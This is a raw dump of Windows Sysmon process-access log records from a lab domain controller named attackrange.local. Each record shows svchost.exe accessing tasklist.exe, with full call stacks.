21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026001Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026000Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025999Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025998Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025997Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025996Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025995Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025994Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025993Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025992Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025991Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025990Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025989Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025988Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025987Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025986Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025985Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025984Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025983Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025982Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025981Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025980Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025979Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025978Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 